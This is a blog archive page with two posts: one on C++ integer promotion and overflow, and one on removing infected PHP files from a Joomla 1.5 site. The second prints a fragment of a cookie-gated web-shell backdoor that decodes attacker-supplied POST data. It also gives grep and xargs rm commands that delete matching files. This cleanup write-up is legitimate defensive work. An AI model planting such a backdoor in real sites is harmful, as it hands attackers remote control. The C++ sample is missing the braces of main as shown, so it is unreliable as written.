Author Archives: superadmin

Numeric promotions and conversions in C++

In the following C++ code the values of ‘z’ and ‘n’ are undefined, because they are the result of an operation with signed integer arithmetic overflow (‘x’ and ‘y’ are first implicitly converted to signed int). The value of ‘w’ is implementation defined, because it is the result of a conversion:

#include <iostream>
#include <bitset>

int main(int argc, char *argv[])
    unsigned short x = 65535, y = x;
    unsigned short z = x * y;
    unsigned int n = x * y;
    std::cerr << "z = " << std::bitset<16>(z) << ", n = " << std::bitset<32>(n) << ", sizeof(int) = " << sizeof(int) << std::endl;

    short w = 0x80000000;
    return 0;

see Numeric conversions section of Implicit conversions article.

How I removed infected PHP files from Joomla 1.5 wesite.

I noticed that there are some suspicious PHP files with the following content on my Joomla 1.5 website:

if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
  echo '<textarea id=areatext>';
  echo '</textarea>bg';

I used the following commands to list them and remove them:

find -type f -name "*.php" -printf '%T@ %p\n' | sort -r | awk '{print $2}' | xargs ls -l | less -N
grep --color -r -i -l "3469825000034634" . --include=*.{php,css,html} | xargs ls -l
grep --color -r -i -l "3469825000034634" . --include=*.{php,css,html} | xargs rm